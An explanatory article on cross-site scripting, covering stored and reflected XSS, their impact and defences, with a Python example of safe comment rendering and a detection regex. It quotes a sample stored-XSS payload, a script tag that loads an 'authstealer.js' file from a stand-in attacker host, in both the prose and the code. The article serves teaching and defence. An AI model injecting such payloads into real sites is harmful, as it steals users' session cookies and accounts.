Cross-site scripting
Cross-site scripting, or XSS, is one of the most dangerous and malicious, yet most widespread and common, web attacks. It seeks to gain access to and control of a user's browser by exploiting vulnerabilities in a web application, and thereby to gain access to the user's confidential and sensitive information. So, what exactly is cross-site scripting?
Attackers use vulnerabilities in legitimate websites or web applications to inject malicious scripts or code that gets executed when an unsuspecting victim (the user) loads the website. The main difference between XSS and other web attack vectors is that this client-side code injection attack is not aimed at the web application itself, but at the users of the vulnerable application.
XSS attacks are generally broken down into two types: Stored (Persistent) XSS and Reflected XSS.
Stored XSS is considered the most malicious and damaging type of XSS attack. Here, the malicious payload (the injected script) is injected directly into the website or web application by exploiting its vulnerabilities, and the injected script is saved by the site and served to the web browser of every visitor. So, every time a victim visits the website, the script gets activated, and the session cookie of each visitor is sent to the attacker. This is why stored XSS is also known as persistent XSS.
Example: While snooping around different websites, an attacker finds a vulnerability in the comment section of a specific website that allows users to embed HTML tags. So, the attacker posts a comment containing a malicious script that reads something like: Hi there! I am John and I loved this product. You can find my detailed review here. <script src="http://hackersite.com/authstealer.js"> </script>. So, whenever any user visits the page, whether or not they scroll to the comments section, the malicious payload is triggered, and that user's session cookie is stolen by the attacker. Using this stolen cookie, the attacker can gain access to the user's personal and confidential information, such as bank account details, credit card information, etc.
Reflected XSS is where the malicious payload is embedded in a link and activated only when the user clicks on the link. Here, the malicious payload is not stored; it is only reflected back into the web page from the URL or POST data.
As mentioned earlier, Stored XSS is the most damaging type of XSS attack. There are three major reasons for this:
1. It is persistent, i.e. it keeps getting executed every time a user visits the website.
2. It is invisible to the browsers' XSS filters, unlike reflected XSS, which can be detected by the built-in XSS filters of most browsers such as Chrome, Edge, etc.
3. It can be triggered just by visiting the website, unlike reflected XSS attacks, where clicking on the malicious link is required. This greatly increases the reach of a stored XSS attack.
As mentioned earlier, the main cause of XSS attacks is the presence of vulnerabilities and gaps in the web application or website that attackers can identify by snooping around and then use as the medium to inject the malicious payload.
These gaps could exist because the page permits unencoded or unvalidated user input, which mostly happens on sites that allow comments, feedback, user posts, etc., such as blogs, social media websites, and video and content sharing websites. The vulnerability could also come from legacy or redundant VBScript, ActiveX, JavaScript, Flash script, etc. used in the web application.
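As an added example (not code from the original post), here is how a comment like the one in the example above can be rendered without becoming a stored XSS payload: the weak form drops the stored text straight into the page, the hardened form HTML-encodes it and then re-enables only a short allow-list of bare formatting tags, and a simple check flags already-stored comments that deserve review. The sample comment, the allowed-tag list and the function names are assumptions for illustration.

```python
"""Rendering stored user comments with and without output encoding (added example)."""
import html
import re

# Constructed sample, modelled on the comment-section scenario in the post.
MALICIOUS_COMMENT = (
    "Hi there! I am John and I loved this product. You can find my detailed "
    'review here. <script src="http://hackersite.com/authstealer.js"> </script>'
)

# Tags a comment may contain. They carry no attributes, so none can run script.
ALLOWED_TAGS = ("b", "i", "em", "strong", "p")


def render_unsafe(comment: str) -> str:
    """The weak form: stored text is pasted into the page verbatim."""
    return f'<div class="comment">{comment}</div>'


def render_safe(comment: str) -> str:
    """The hardened form: encode every character HTML cares about, then
    re-enable only the bare allow-listed tags. A user who literally types
    '&lt;b&gt;' gets '&amp;lt;b&amp;gt;' from html.escape, so it is never re-enabled."""
    encoded = html.escape(comment, quote=True)
    for tag in ALLOWED_TAGS:
        encoded = encoded.replace(f"&lt;{tag}&gt;", f"<{tag}>")
        encoded = encoded.replace(f"&lt;/{tag}&gt;", f"</{tag}>")
    return f'<div class="comment">{encoded}</div>'


# Patterns worth a second look when scanning comments already in the database:
# script tags, javascript: URLs and inline event handlers.
SUSPECT_RE = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)


def looks_like_stored_xss(comment: str) -> bool:
    """Review aid for stored content; output encoding, not this check, is the fix."""
    return SUSPECT_RE.search(comment) is not None


if __name__ == "__main__":
    print(render_unsafe(MALICIOUS_COMMENT))
    print(render_safe(MALICIOUS_COMMENT))
    print(looks_like_stored_xss(MALICIOUS_COMMENT))
```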
Impact
The impact and severity of successful XSS attacks vary widely. XSS attacks can result in session hijacking, stolen tokens and session cookies, and CSRF (cross-site request forgery) attacks. These, in turn, lead to user accounts being compromised and possibly breached. The attacker is then able to use the stolen cookies to impersonate valid users. In cases where the valid user has administrative rights in the application, the attacker can use those privileges to even alter pages or execute code on the server side.
Even though XSS attacks are aimed at the users of web applications, there are heavy losses to the organization as well. How? There are obvious monetary losses, but what costs organizations dearly is the loss of customers, brand image and reputation.
Many browsers have built-in filters to prevent XSS attacks, but one cannot rely only on client-side capabilities to prevent them. As a website owner, it is imperative for the business to detect and fix the underlying vulnerabilities. Moreover, the XSS filters present in most web browsers do not catch all variants of XSS attacks. Continuous detection and scanning of your applications, along with a web application firewall (WAF), is one of the most effective and widely used solutions to secure web applications and their users from XSS attacks.